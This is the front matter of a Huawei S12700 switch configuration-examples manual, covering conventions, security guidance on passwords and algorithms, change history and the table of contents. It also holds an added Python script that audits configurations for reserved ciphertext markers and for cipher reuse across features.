
S12700 Series Agile Switches

Typical Configuration Examples

Issue 10
Date 2016-10-30

HUAWEI TECHNOLOGIES CO., LTD.


Copyright © Huawei Technologies Co., Ltd. 2016. All rights reserved.
No part of this document may be reproduced or transmitted in any form or by any means without prior written
consent of Huawei Technologies Co., Ltd.

Trademarks and Permissions

and other Huawei trademarks are trademarks of Huawei Technologies Co., Ltd.
All other trademarks and trade names mentioned in this document are the property of their respective
holders.

Notice
The purchased products, services and features are stipulated by the contract made between Huawei and the
customer. All or part of the products, services and features described in this document may not be within the
purchase scope or the usage scope. Unless otherwise specified in the contract, all statements, information,
and recommendations in this document are provided "AS IS" without warranties, guarantees or
representations of any kind, either express or implied.

The information in this document is subject to change without notice. Every effort has been made in the
preparation of this document to ensure accuracy of the contents, but all statements, information, and
recommendations in this document do not constitute a warranty of any kind, express or implied.

Huawei Technologies Co., Ltd.


Address: Huawei Industrial Base
Bantian, Longgang
Shenzhen 518129
People's Republic of China

Website: http://e.huawei.com

Issue 10 (2016-10-30) Huawei Proprietary and Confidential i


Copyright © Huawei Technologies Co., Ltd.
S12700 Series Agile Switches
Typical Configuration Examples About This Document

About This Document

This document provides the typical configuration examples supported by the device.
This document is intended for:
l Data configuration engineers
l Commissioning engineers
l Network monitoring engineers
l System maintenance engineers

Symbol Conventions
The symbols that may be found in this document are defined as follows.

Symbol Description
(symbol) Indicates an imminently hazardous situation which, if not avoided, will result in death or serious injury.
(symbol) Indicates a potentially hazardous situation which, if not avoided, could result in death or serious injury.
(symbol) Indicates a potentially hazardous situation which, if not avoided, may result in minor or moderate injury.
NOTICE Indicates a potentially hazardous situation which, if not avoided, could result in equipment damage, data loss, performance deterioration, or unanticipated results. NOTICE is used to address practices not related to personal injury.
NOTE Calls attention to important information, best practices and tips. NOTE is used to address information not related to personal injury, equipment damage, and environment deterioration.


Command Conventions
The command conventions that may be found in this document are defined as follows.

Convention Description
Boldface The keywords of a command line are in boldface.
Italic Command arguments are in italics.
[ ] Items (keywords or arguments) in brackets [ ] are optional.
{ x | y | ... } Alternative items are grouped in braces and separated by vertical bars. Exactly one item must be selected.
[ x | y | ... ] Optional items are grouped in brackets and separated by vertical bars. One item or no item is selected.
{ x | y | ... }* Alternative items are grouped in braces and separated by vertical bars. A minimum of one item and a maximum of all items can be selected.
[ x | y | ... ]* Optional items are grouped in brackets and separated by vertical bars. Several items or no item can be selected.
&<1-n> The parameter before the & sign can be repeated 1 to n times.
# A line starting with the # sign is a comment.

Interface Numbering Conventions


Interface numbers used in this manual are examples. In device configuration, use the existing
interface numbers on devices.

Security Conventions
l Password setting
– To ensure device security, configure passwords in ciphertext form and change them periodically.
– The switch treats any password that starts and ends with %^%#, %#%#, %@%@ or @%@% as ciphertext and decrypts it. If you enter a plaintext password that starts and ends with one of these markers, the switch misinterprets it as ciphertext, decrypts it, and records the result in the configuration file (plaintext passwords are never written to the configuration file, for security), so the stored credential is not the password you typed. Therefore, do not set a password that starts and ends with %^%#, %#%#, %@%@ or @%@%.
– When you configure passwords in ciphertext, use a different ciphertext password for each feature. For example, the ciphertext password set for the AAA feature cannot be used for other features.


l Encryption algorithms
The switch currently supports the 3DES, AES, RSA, SHA1, SHA2, and MD5 algorithms. 3DES, AES, and RSA are reversible encryption algorithms, whereas SHA1, SHA2, and MD5 are one-way (irreversible) hash algorithms. Using DES, 3DES, RSA with 1024-bit or shorter keys, MD5 (for digital signatures or for protecting stored passwords), or SHA1 (for digital signatures) is a security risk. Where the protocol allows, use stronger algorithms such as AES, RSA with 2048-bit or longer keys, SHA2, or HMAC-SHA2.
The administrator password must be protected with a one-way (irreversible) algorithm; SHA2 is recommended for this purpose.
l Personal data
Some personal data may be obtained or used during operation and fault location of your
purchased products, services, or features. Set up privacy policies and take appropriate
measures to protect personal data based on regional privacy laws.
l Mirroring
The terms mirrored port, port mirroring, traffic mirroring, and mirroring in this
document are mentioned only to describe the product's function of communication error
or failure detection, and do not involve collection or processing of any personal
information or communication data of users.
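The two password rules above (a plaintext password must not start and end with one of the reserved ciphertext markers, and a ciphertext password must not be reused across features) can be checked mechanically before a configuration is committed. The following is an added example written for this page, not Huawei code. The four markers %^%#, %#%#, %@%@ and @%@% come from the text; the configuration lines the script scans are constructed for illustration and their syntax is only approximate, and treating the first keyword of a command as its "feature" is an assumption of the example.

```python
"""Audit checks derived from the password rules in the Security Conventions.

Added example for this page, not Huawei code. The ciphertext markers are taken
from the text; SAMPLE_CONFIG below is constructed and does not come from a device.
"""
import re
from collections import defaultdict

# Markers the switch treats as delimiting ciphertext (from the page).
CIPHERTEXT_MARKERS = ("%^%#", "%#%#", "%@%@", "@%@%")

# A ciphertext token on a configuration line: a marker, an opaque body with no
# whitespace, and the same marker again.
_CIPHER_RE = re.compile(r"(?P<m>%\^%#|%#%#|%@%@|@%@%)(?P<body>\S+?)(?P=m)")

# Constructed sample configuration (illustrative syntax only). The same cipher
# blob is deliberately reused by the AAA (local-user) and SNMP features.
SAMPLE_CONFIG = """\
# constructed sample, not from a real device
local-user admin password irreversible-cipher %^%#AbC123xyz%^%#
snmp-agent usm-user v3 nms authentication-mode sha cipher %^%#AbC123xyz%^%#
ntp-service authentication-keyid 1 authentication-mode hmac-sha256 cipher %@%@Key9Key9%@%@
local-user ops password irreversible-cipher %#%#OpsOps%#%#
"""


def looks_like_ciphertext(password: str) -> bool:
    """True if the switch would parse `password` as ciphertext.

    The page says passwords starting and ending with a marker are decrypted, so
    a plaintext candidate matching this shape would not be stored as typed.
    Deliberately conservative: any marker at the start and any marker at the
    end is flagged, and a bare marker with no body between them is not.
    """
    start = next((m for m in CIPHERTEXT_MARKERS if password.startswith(m)), None)
    end = next((m for m in CIPHERTEXT_MARKERS if password.endswith(m)), None)
    if start is None or end is None:
        return False
    return len(password) > len(start) + len(end)


def feature_of(line: str) -> str:
    """Assumption of this example: the first keyword of a command names its feature."""
    return line.split()[0]


def find_reused_ciphertext(config_text: str) -> dict:
    """Map each cipher blob that appears under more than one feature to the
    sorted list of features using it. Lines starting with '#' are comments
    (Command Conventions) and are skipped."""
    features_by_blob = defaultdict(set)
    for raw in config_text.splitlines():
        line = raw.strip()
        if not line or line.startswith("#"):
            continue
        for match in _CIPHER_RE.finditer(line):
            features_by_blob[match.group(0)].add(feature_of(line))
    return {blob: sorted(feats) for blob, feats in features_by_blob.items() if len(feats) > 1}


if __name__ == "__main__":
    for candidate in ("Secret1!", "%^%#Secret1%^%#"):
        verdict = "REJECT (would be read as ciphertext)" if looks_like_ciphertext(candidate) else "ok"
        print(f"{candidate!r}: {verdict}")
    for blob, feats in find_reused_ciphertext(SAMPLE_CONFIG).items():
        print(f"ciphertext {blob} reused across features: {', '.join(feats)}")
```

Run the script against an exported configuration instead of SAMPLE_CONFIG to find cross-feature reuse; run looks_like_ciphertext over candidate passwords before typing them into the CLI.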

Disclaimer
This document is designed as a reference for configuring your devices. Its contents, including web pages and command line input and output, are based on laboratory conditions. It provides instructions for general scenarios but does not cover all use cases of all product models. The examples given may differ from your use case because of differences in software versions, models, and configuration files. When configuring your devices, adapt the configuration to your use case.
The specifications provided in this document were tested in a lab environment (for example, the tested device was installed with a certain type of board, or only one protocol was running on the device). Results may differ from the listed specifications when you attempt to obtain the maximum values with multiple functions enabled on the device.

Change History
Updates between document issues are cumulative. Therefore, the latest document issue
contains all updates made in previous issues.

Changes in Issue 10 (2016-10-30)


Mistakes in the document are corrected.

Changes in Issue 09 (2016-08-12)


The documentation is modified according to updates in V200R010C00.

Changes in Issue 08 (2016-07-22)


The following information is added:


l 16.8 Example for Configuring MAC Address-prioritized Portal Authentication
l 10.6.5 Example for Configuring Guest Access Using Social Media Accounts
(GooglePlus, Facebook, or Twitter Accounts) (V200R007C20, V200R009C00 and
Later Versions)

The following information is modified:

l 10.6.4 Example for Configuring User Authorization Based on ACL or Dynamic VLAN Delivery
l 19 Typical Configuration for Interconnection Between Switches and IP Phones

Changes in Issue 07 (2016-06-30)


Mistakes in the document are corrected.

Changes in Issue 06 (2016-03-16)


The following information is added:

l 2.6 Example for Configuring ACU2 and NGFW on Switches

Changes in Issue 05 (2016-01-11)


The following information is added:

l 6.3.2 Example for Configuring Interface-based VLAN Assignment (Access Device Used as the Gateway)
l 6.3.3 Example for Configuring Interface-based VLAN Assignment (Aggregation
Device Used as the Gateway)
l 6.3.7 Example for Connecting a Terminal to a Layer 3 Gateway Through a Layer 2
Switch
l 17.3 Example for Configuring a Traffic Policy to Implement Rate Limiting
l 17.12 Example for Configuring a Traffic Policy to Limit Access Between Network
Segments
l 8.1.2 Example for Configuring a Device as the DHCP Server (Based on the Global
Address Pool)
l 8.1.3 Example for Configuring a DHCP Server to Allocate Different Network
Parameters from the Global Address Pool to Dynamic and Static Clients
l 8.1.6 Example for Configuring a DHCP Client
l 8.1.7 Example for Configuring DHCP Servers Based on the Global Address Pool on
the Same Network Segment in VRRP Networking
l 9.1.1 Example for Configuring Static Routes for Interworking Between Different
Network Segments
l 9.1.2 Example for Configuring Static Routes for Load Balancing
l 9.1.3 Example for Configuring Static Routes for Link Backup
l 9.3.1 Example for Configuring Traffic Policies to Implement Policy-based Routing
(Redirection to Different Next Hops)


The following information is modified:


l 18.1.1 Example for Configuring a Device to Communicate with the NMS Using
SNMPv1
l 18.1.2 Example for Configuring a Device to Communicate with the NMS Using
SNMPv2c
l 18.1.3 Example for Configuring a Device to Communicate with the NMS Using
SNMPv3

Changes in Issue 04 (2015-10-23)


The following information is added:
l 22 Typical NGFW Module Configuration
l 10.1.4 Example for Configuring Authentication for Telnet Login Users (Using the
Secure ACS as a RADIUS Authentication Server)
l 2.1 Example for Configuring Egress Devices for Small- and Medium-Scale Campus
or Branch Networks
l 2.2 Example for Configuring the Egress of a Large-scale Campus (Firewalls Are
Connected to Core Switches in In-line Mode)
l 2.3 Example for Configuring the Egress of a Large-scale Campus (Firewalls Are
Connected to Core Switches in Bypass Mode)
l 2.4 Example for Configuring an Agile Campus Network
l 17.11 Example for Limiting Access Based on the Flow ID

Changes in Issue 03 (2015-09-30)


The documentation is modified according to updates in V200R007C20.

Changes in Issue 02 (2015-07-31)


The documentation is modified according to updates in V200R008C00.

Changes in Issue 01 (2015-02-12)


Initial commercial release.


Contents

About This Document.....................................................................................................................ii


1 Use the Quick Search Tool.......................................................................................................... 1
2 Comprehensive configuration example.................................................................................... 2
2.1 Example for Configuring Egress Devices for Small- and Medium-Scale Campus or Branch Networks...................... 3
2.2 Example for Configuring the Egress of a Large-scale Campus (Firewalls Are Connected to Core Switches in In-line Mode)..........25
2.3 Example for Configuring the Egress of a Large-scale Campus (Firewalls Are Connected to Core Switches in Bypass Mode)..........53
2.4 Example for Configuring an Agile Campus Network.................................................................................................. 81
2.4.1 Solution Overview..................................................................................................................................................... 81
2.4.2 Networking Requirements......................................................................................................................................... 81
2.4.3 Network Planning...................................................................................................................................................... 83
2.4.4 Feature Planning........................................................................................................................................................ 85
2.4.5 Data Planning............................................................................................................................................................ 88
2.4.6 Configuration Procedure............................................................................................................................................91
2.4.7 Summary and Recommendations............................................................................................................................ 101
2.5 Example for Configuring High-Speed Self Recovery on a Subway Bearer Network................................................102
2.5.1 Service Requirements and Solution Description..................................................................................................... 102
2.5.2 Basic Configuration................................................................................................................................................. 106
2.5.2.1 Data Plan...............................................................................................................................................................106
2.5.2.2 Configuring Device Information.......................................................................................................................... 110
2.5.2.3 Configuring Interfaces.......................................................................................................................................... 111
2.5.2.4 Enabling BFD....................................................................................................................................................... 113
2.5.3 Deploying OSPF...................................................................................................................................................... 114
2.5.3.1 Configuration Roadmap........................................................................................................................................114
2.5.3.2 Deploying OSPF................................................................................................................................................... 114
2.5.4 Deploying MPLS LDP.............................................................................................................................................117
2.5.4.1 Configuration Roadmap........................................................................................................................................117
2.5.4.2 Data Plan...............................................................................................................................................................117
2.5.4.3 Enabling MPLS LDP............................................................................................................................................ 118
2.5.4.4 Configuring Synchronization Between LDP and OSPF.......................................................................................120
2.5.4.5 Configuring LDP GR............................................................................................................................................120
2.5.4.6 Configuring BFD for LSP.................................................................................................................... 121
2.5.5 Deploying MPLS TE............................................................................................................................... 122
2.5.5.1 Configuration Roadmap....................................................................................................................................... 122
2.5.5.2 Data Plan...............................................................................................................................................................123
2.5.5.3 Configuring MPLS TE Tunnels and Hot Standby................................................................................................126
2.5.5.4 Configuring RSVP GR......................................................................................................................................... 130
2.5.5.5 Configuring BFD for CR-LSP..............................................................................................................................131
2.5.6 Deploying L3VPN Services and Protection (HoVPN)............................................................................................133
2.5.6.1 Configuration Roadmap....................................................................................................................................... 133
2.5.6.2 Data Plan...............................................................................................................................................................135
2.5.6.3 Configuring MP-BGP...........................................................................................................................................138
2.5.6.4 Configuring an L3VPN........................................................................................................................................ 141
2.5.6.5 Configuring Reliability Protection....................................................................................................................... 143
2.5.7 Configuration Files.................................................................................................................................................. 148
2.5.7.1 Core_SPE1 Configuration File............................................................................................................................. 148
2.5.7.2 Core_SPE2 Configuration File............................................................................................................................. 154
2.5.7.3 Core_SPE3 Configuration File............................................................................................................................. 160
2.5.7.4 Site1_UPE1 Configuration File............................................................................................................................166
2.5.7.5 Site1_UPE2 Configuration File............................................................................................................................170
2.5.7.6 Site2_UPE3 Configuration File............................................................................................................................173
2.5.7.7 Site2_UPE4 Configuration File............................................................................................................................177
2.5.7.8 Site3_UPE5 Configuration File............................................................................................................................180
2.5.7.9 Site3_UPE6 Configuration File............................................................................................................................183
2.6 Example for Configuring ACU2 and NGFW on Switches........................................................................................ 187

3 Typical Login Configuration...................................................................................................201
3.1 Example for Configuring Switch Login Through a Console Port..............................................................................202
3.2 Example for Configuring Telnet Login (Based on ACL Rules and RADIUS Authentication)................................. 207
3.3 Example for Configuring STelnet Login (Based on RADIUS Authentication)......................................................... 211
3.4 Example for Configuring Switch Login Through the Web System........................................................................... 215
3.4.1 Factory Settings of Web Page Files for S Series Switches...................................................................................... 215
3.4.2 Example for Configuring Switch Login Through the Web System (V200R005)................................................... 216
3.4.3 Example for Configuring Switch Login Through the Web System........................................................................ 221

4 Typical File Management Configuration............................................................................. 225
4.1 Example for Logging In to the Device to Manage Files............................................................................................ 226
4.2 Example for Managing Files Using FTP.................................................................................................................... 227
4.3 Example for Managing Files Using SFTP..................................................................................................................230
4.4 Example for Accessing Files on Other Devices Using TFTP.................................................................................... 233
4.5 Example for Accessing Files on Other Devices Using FTP.......................................................................................235
4.6 Example for Accessing Files on Other Devices Using SFTP.................................................................................... 237

5 Typical Ethernet Interface Configuration.............................................................................249
5.1 Example for Configuring a Combo Interface............................................................................................................. 250
5.2 Example for Configuring the Rate and Duplex Mode of an Ethernet Interface.........................................252
5.3 Example for Switching an Interface Between Layer 2 and Layer 3 Modes...............................................257
5.4 Example for Configuring Port Isolation..................................................................................................................... 259

6 Typical Ethernet Switching Configuration.......................................................................... 263
6.1 Typical MAC Configuration.......................................................................................................................................264
6.1.1 Example for Configuring MAC Address Limiting in a VLAN...............................................................................264
6.1.2 Example for Configuring MAC Address Limiting on an Interface.........................................................................266
6.2 Link Aggregation Configuration................................................................................................................................ 268
6.2.1 Example for Configuring Link Aggregation in Manual Mode When Switches Are Directly Connected.............. 268
6.2.2 Example for Configuring Link Aggregation in LACP Mode When Switches Are Directly Connected................ 271
6.2.3 Example for Connecting an E-Trunk to a VPLS Network...................................................................................... 274
6.2.4 Example for Configuring an Eth-Trunk Interface to Preferentially Forward Local Traffic....................................286
6.2.5 Example for Configuring an Eth-Trunk and Association Between VRRP and the Interface Status.......................291
6.3 Typical VLAN Configuration.....................................................................................................................................302
6.3.1 Example for Configuring Interface-based VLAN Assignment............................................................................... 302
6.3.2 Example for Configuring Interface-based VLAN Assignment (Access Device Used as the Gateway)................. 309
6.3.3 Example for Configuring Interface-based VLAN Assignment (Aggregation Device Used as the Gateway)........ 313
6.3.4 Example for Configuring MAC Address-based VLAN Assignment...................................................................... 317
6.3.5 Example for Configuring IP Subnet-based VLAN Assignment............................................................................. 323
6.3.6 Example for Directly Connecting a Terminal to a Layer 3 Gateway to Implement Inter-VLAN Communication..........330
6.3.7 Example for Connecting a Terminal to a Layer 3 Gateway Through a Layer 2 Switch......................................... 332
6.3.8 Example for Configuring Communication Between Different Network Segments Through Static Routes........... 336
6.3.9 Example for Configuring the Super-VLAN............................................................................................................ 341
6.3.10 Example for Configuring MUX VLAN to Isolate Users in the Same VLAN.......................................................345
6.4 Typical QinQ Configuration....................................................................................................................................... 350
6.4.1 Example for Configuring Basic QinQ..................................................................................................................... 350
6.4.2 Example for Configuring VLAN ID-based Selective QinQ....................................................................................353
6.4.3 Example for Configuring Flow-based Selective QinQ............................................................................................356
6.5 Typical Loopback Detection Configuration............................................................................................................... 360
6.5.1 Example for Configuring LDT to Detect Loops on the Downstream Network...................................................... 360
6.5.2 Example for Configuring LDT to Detect Loops on the Local Network..................................................................364
6.5.3 Example for Configuring LBDT to Detect Loopbacks on an Interface.................................................................. 369
6.5.4 Example for Configuring LBDT to Detect Loops on the Downstream Network....................................................373
6.5.5 Example for Configuring LBDT to Detect Loops on the Local Network...............................................................376

7 Typical Examples of MSTP/RRPP/SEP/VBST..................................................................... 381
7.1 Example for Configuring STP.................................................................................................................................... 382
7.2 Example for Configuring RSTP................................................................................................................................. 386
7.3 Example for Configuring MSTP................................................................................................................................ 391
7.4 Example for Configuring MSTP and VRRP.............................................................................................................. 400
7.5 Example for Configuring a Single RRPP Ring with a Single Instance...................................................................... 411
7.6 Example for Configuring Tangent RRPP Rings.........................................................................................................416
7.7 Example for Configuring RRPP Snooping on a VPLS Network............................................................................... 424

Issue 10 (2016-10-30) Huawei Proprietary and Confidential ix


Copyright © Huawei Technologies Co., Ltd.
S12700 Series Agile Switches
Typical Configuration Examples Contents

7.8 Example for Configuring SEP and MSTP on a Network........................................................................................... 431


7.9 Example for Configuring SEP and RRPP on a Network............................................................................................440
7.10 Example for Configuring VBST...............................................................................................................................452

8 Typical IP Service Configuration........................................................................................... 463
8.1 Typical DHCP Configuration..................................................................................................................................... 464
8.1.1 Example for Configuring the Device as a DHCP Server (Based on the Interface Address Pool).......................... 464
8.1.2 Example for Configuring a Device as the DHCP Server (Based on the Global Address Pool)..............................468
8.1.3 Example for Configuring a DHCP Server to Allocate Different Network Parameters from the Global Address Pool to Dynamic and Static Clients..........472
8.1.4 Example for Configuring the Device as a DHCP Relay (on the Same Network)................................................... 475
8.1.5 Example for Configuring the Device as a DHCP Relay (Across a GRE Tunnel)...................................................480
8.1.6 Example for Configuring a DHCP Client................................................................................................................488
8.1.7 Example for Configuring DHCP Servers Based on the Global Address Pool on the Same Network Segment in VRRP Networking..........492

9 Typical Routing Configuration.............................................................................................. 499
9.1 Typical Static Route Configuration............................................................................................................................ 500
9.1.1 Example for Configuring Static Routes for Interworking Between Different Network Segments......................... 500
9.1.2 Example for Configuring Static Routes for Load Balancing...................................................................................504
9.1.3 Example for Configuring Static Routes for Link Backup....................................................................................... 509
9.1.4 Example for Configuring NQA for IPv4 Static Routes...........................................................................................514
9.1.5 Example for Configuring EFM for IPv4 Static Routes........................................................................................... 523
9.2 Typical OSPF Configuration...................................................................................................................................... 527
9.2.1 Example for Configuring Basic OSPF Functions....................................................................................................527
9.2.2 Example for Configuring an OSPF Stub Area........................................................................................................ 532
9.2.3 Example for Configuring an OSPF NSSA.............................................................................................................. 537
9.2.4 Example for Configuring OSPF Load Balancing....................................................................................................542
9.2.5 Example for Configuring BFD for OSPF................................................................................................................548
9.3 Typical PBR Configuration........................................................................................................................................ 554
9.3.1 Example for Configuring Traffic Policies to Implement Policy-based Routing (Redirection to Different Next Hops)................................................................................................................................................................................ 554

10 Typical User Access and Authentication Configuration................................................. 561


10.1 Typical AAA Configuration..................................................................................................................................... 562
10.1.1 Notice to Be Taken When the Device Connects to Non-Huawei RADIUS Servers............................................. 562
10.1.2 Example for Configuring Authentication for Telnet Login Users (AAA Local Authentication)..........................563
10.1.3 Example for Configuring Authentication for Telnet Login Users (RADIUS Authentication)............................. 565
10.1.4 Example for Configuring Authentication for Telnet Login Users (Using the Secure ACS as a RADIUS Authentication Server)......................................................................................................................................................569
10.1.5 Example for Configuring Authentication for Telnet Login Users (HWTACACS and Local Authentication)..... 589
10.1.6 Example for Configuring Default Domain-based User Management................................................................... 592
10.2 Typical NAC Configuration (Common Mode).........................................................................................................598
10.2.1 Example for Configuring 802.1x Authentication to Control Internal User Access.............................................. 598
10.2.2 Example for Configuring MAC Address Authentication to Control Internal User Access.................................. 602

10.2.3 Example for Configuring Portal Authentication to Control Internal User Access................................................606
10.3 Typical NAC Configuration (Unified Mode) (V200R007C00 and Earlier Versions, V200R008C00)....................610
10.3.1 Example for Configuring 802.1x Authentication to Control Internal User Access...............................................611
10.3.2 Example for Configuring MAC Address Authentication to Control Internal User Access.................................. 615
10.3.3 Example for Configuring Portal Authentication to Control Internal User Access................................................619
10.3.4 Example for Configuring Multiple Authentication Modes to Control Internal User Access................................623
10.4 Typical NAC Configuration (Unified Mode) (V200R007C20, V200R009C00 and Later Versions)...................... 627
10.4.1 Example for Configuring 802.1x Authentication to Control Internal User Access.............................................. 627
10.4.2 Example for Configuring MAC Address Authentication to Control Internal User Access.................................. 632
10.4.3 Example for Configuring Portal Authentication to Control Internal User Access................................................636
10.5 Typical NAC Configuration (Unified Mode) (the Agile Controller as the Authentication Server) (V200R007C00 and Earlier Versions, V200R008C00).............................................................................................................................. 641
10.5.1 Example for Configuring Portal Authentication to Control Internal User Access to the Enterprise Network (Authentication Point on Core Switch)............................................................................................................................ 642
10.5.2 Example for Configuring Portal Authentication to Control Internal User Access to the Enterprise Network (Authentication Point on Aggregation Switch) (V200R007C00 and Earlier Versions, V200R008C00).........................662
10.5.3 Example for Configuring 802.1x and MAC Address Authentication to Control Internal User Access to the Enterprise Network (Authentication Point on Access Switch).........................................................................................680
10.5.4 Example for Configuring 802.1x and MAC Address Authentication to Control Internal User Access to the Enterprise Network (Authentication Point on Aggregation Switch)................................................................................696
10.6 Typical NAC Configuration (Unified Mode) (the Agile Controller as the Authentication Server) (V200R007C20, V200R009C00 and Later Versions)..................................................................................................................................714
10.6.1 Example for Configuring Portal Authentication to Control Internal User Access to the Enterprise Network (Authentication Point on Core Switch)............................................................................................................................ 714
10.6.2 Example for Configuring Portal Authentication to Control Internal User Access to the Enterprise Network (Authentication Point on Aggregation Switch) (V200R007C20, V200R009C00 and Later Versions)........................... 734
10.6.3 Example for Configuring 802.1x and MAC Address Authentication to Control Internal User Access to the Enterprise Network (Authentication Point on Aggregation Switch)................................................................................753
10.6.4 Example for Configuring User Authorization Based on ACL or Dynamic VLAN Delivery............................... 771
10.6.5 Example for Configuring Guest Access Using Social Media Accounts (GooglePlus, Facebook, or Twitter Accounts) (V200R007C20, V200R009C00 and Later Versions).....................................................................................785

11 Typical Reliability Configuration........................................................................................798


11.1 Typical VRRP Configuration....................................................................................................................................799
11.1.1 Example for Configuring a VRRP Group in Active/Standby Mode..................................................................... 799
11.1.2 Example for Configuring a VRRP Group in Load Balancing Mode.....................................................................806
11.1.3 Example for Configuring Association Between VRRP and BFD to Implement a Rapid Active/Standby Switchover........................................................................................................................................................................ 812
11.1.4 Example for Configuring an Eth-Trunk and Association Between VRRP and the Interface Status..................... 818
11.1.5 Example for Configuring VRRP to Ensure Reliable Multicast Data Transmission..............................................829
11.2 Typical BFD Configuration...................................................................................................................................... 844
11.2.1 Example for Associating the BFD Session Status with the Interface Status......................................................... 844

12 Typical Security Configuration............................................................................................ 850


12.1 Typical ACL Configuration......................................................................................................................................851
12.1.1 Example for Using an ACL to Restrict FTP Access Rights..................................................................................851

12.1.2 Example for Using ACLs to Control Access to the Specified Server in the Specified Time Range.................... 853
12.1.3 Example for Using an ACL to Block Network Access of the Specified Users.....................................................859
12.1.4 Example for Using Reflective ACL to Implement Unidirectional Access Control.............................................. 862
12.1.5 Example for Allowing Certain Users to Access the Internet in the Specified Time Range.................................. 864
12.1.6 Example for Using ACLs to Restrict Mutual Access Between Network Segments............................................. 868
12.1.7 Example for Using an ACL to Prevent Internal Hosts from Accessing the Internet.............................................872
12.1.8 Example for Using an ACL to Prevent External Hosts from Accessing Internal Servers.................................... 875
12.1.9 Example for Applying ACLs to SNMP to Filter NMSs........................................................................................880
12.2 Example for Configuring Port Security....................................................................................................................882

13 Typical CSS Configuration of Modular Switches............................................................ 885


13.1 Example for Setting Up a CSS................................................................................................................................. 886

14 Typical MPLS&VPN Configuration....................................................................................896


14.1 Typical BGP/MPLS IP VPN Configuration............................................................................................................. 897
14.1.1 Example for Configuring BGP/MPLS IP VPN..................................................................................................... 897
14.1.2 Example for Configuring an MCE........................................................................................................................ 910
14.1.3 Example for Configuring Multicast VPN Access Through MCE Devices........................................................... 923
14.1.4 Example for Configuring L3VPN and VRRP....................................................................................................... 945
14.1.5 Example for Configuring Routing Policies to Control Mutual Access Between L3VPN Users.......................... 958
14.2 Example for Connecting QinQ Termination Sub-interfaces to a VLL Network......................................................966
14.3 Example for Deploying BGP/MPLS IP VPN and VPLS on One ISP Network.......................................................977

15 Typical WLAN-AC Configuration (Applicable to Versions V200R005 to V200R008).......................................................................................................................................................... 995
15.1 Common Misconfigurations..................................................................................................................................... 996
15.1.1 Multicast Packet Suppression Is Not Configured, and a Large Number of Low-Rate Multicast Packets Affect the Wireless Network............................................................................................................................................................. 996
15.2 Example for Configuring WLAN Services on a Small-Scale Network................................................................... 997
15.3 Example for Configuring the WLAN Service on Medium- and Large-Scale Campus Networks......................... 1006
15.4 Example for Configuring Unified Access for Wired and Wireless Users.............................................................. 1016
15.5 Example for Configuring WLAN Services for a Wireless City Project (AC Bypass Deployment, Portal Authentication)............................................................................................................................................................... 1035
15.6 Example for Configuring MAC Address Authentication on the Wireless Side..................................................... 1055
15.7 Example for Configuring Portal Authentication on the Wireless Side...................................................................1064
15.8 Configuring Radio Calibration............................................................................................................................... 1075
15.8.1 Example for Configuring Radio Calibration....................................................................................................... 1075
15.8.2 Example for Configuring Session-based Static Load Balancing.........................................................................1085
15.8.3 Example for Configuring Traffic-based Dynamic Load Balancing.................................................................... 1094
15.9 Configuring WLAN Roaming................................................................................................................................ 1104
15.9.1 Example for Configuring Non-Fast Roaming Between APs in the Same Service VLAN..................................1104
15.9.2 Example for Configuring Fast Roaming Between APs in the Same Service VLAN.......................................... 1113
15.9.3 Example for Configuring Non-Fast Roaming Between APs in Different Service VLANs................................ 1124
15.9.4 Example for Configuring Fast Roaming Between APs in Different Service VLANs.........................................1134
15.10 Example for Configuring the WLAN Service Using WDS Technology..............................................................1146

15.11 Example for Configuring the WLAN Service Using Mesh Technology.............................................................. 1159

16 Typical WLAN-AC Configuration (Applicable to Version V200R009).................... 1171


16.1 Common Misconfigurations................................................................................................................................... 1172
16.1.1 Multicast Packet Suppression Is Not Configured, and a Large Number of Low-Rate Multicast Packets Affect the Wireless Network............................................................................................................................................................1172
16.2 Example for Configuring WLAN Services on a Small-Scale Network................................................................. 1173
16.3 Example for Configuring the WLAN Service on Medium- and Large-Scale Campus Networks..........................1181
16.4 Example for Configuring Unified Access for Wired and Wireless Users.............................................................. 1190
16.5 Example for Configuring WLAN Services for a Wireless City Project (AC Bypass Deployment, Portal Authentication)............................................................................................................................................................... 1210
16.6 Example for Configuring MAC Address Authentication on the Wireless Side..................................................... 1231
16.7 Example for Configuring Portal Authentication on the Wireless Side...................................................................1240
16.8 Example for Configuring MAC Address-prioritized Portal Authentication.......................................................... 1255
16.9 Configuring Radio Calibration............................................................................................................................... 1266
16.9.1 Example for Configuring Radio Calibration....................................................................................................... 1266
16.9.2 Example for Configuring Static Load Balancing................................................................................................ 1276
16.9.3 Example for Configuring Dynamic Load Balancing...........................................................................................1286
16.10 Configuring WLAN Roaming.............................................................................................................................. 1296
16.10.1 Example for Configuring Intra-AC Roaming....................................................................................................1296
16.11 Example for Configuring the WLAN Service Using WDS Technology..............................................................1305
16.12 Example for Configuring the WLAN Service Using Mesh Technology..............................................................1319

17 Typical QoS Configuration................................................................................................. 1329


17.1 Example for Configuring Priority Re-marking and Queue Scheduling................................................................. 1330
17.2 Example for Configuring Interface-based Rate Limiting.......................................................................................1334
17.3 Example for Configuring a Traffic Policy to Implement Rate Limiting................................................................ 1337
17.4 Example for Configuring Rate Limiting in a Specified Time Range..................................................................... 1342
17.5 Example for Configuring Rate Limiting Based on VLAN IDs..............................................................................1345
17.6 Example for Configuring Traffic Shaping..............................................................................................................1350
17.7 Example for Configuring Congestion Avoidance and Congestion Management...................................................1354
17.8 Example for Configuring a Traffic Policy to Prevent Some Users from Accessing the Internet at the Specified Time........................................................................................................................................................................ 1359
17.9 Example for Configuring a Traffic Policy to Collect Statistics on Ping Packets................................................... 1364
17.10 Example for Configuring a Traffic Policy to Implement Traffic Statistics.......................................................... 1370
17.11 Example for Limiting Access Based on the Flow ID........................................................................................... 1375
17.12 Example for Configuring a Traffic Policy to Limit Access Between Network Segments................................... 1385
17.13 Example for Configuring HQoS...........................................................................................................................1390

18 Typical Network Management and Monitoring Configuration.................................. 1402


18.1 Typical SNMP Configuration................................................................................................................................. 1403
18.1.1 Example for Configuring a Device to Communicate with the NMS Using SNMPv1........................................ 1403
18.1.2 Example for Configuring a Device to Communicate with the NMS Using SNMPv2c...................................... 1405
18.1.3 Example for Configuring a Device to Communicate with the NMS Using SNMPv3........................................ 1408
18.1.4 Example for Configuring eSight and Switches to Communicate Through SNMPv2c........................................1411

18.2 Typical NetStream Configuration...........................................................................................................................1418
18.2.1 Example for Configuring Original Flow Statistics Exporting.............................................................................1418
18.2.2 Example for Configuring Aggregation Flow Statistics Exporting...................................................................... 1423
18.2.3 Example for Configuring Flexible Flow Statistics Exporting............................................................................. 1426
18.3 Typical Mirroring Configuration............................................................................................................................ 1431
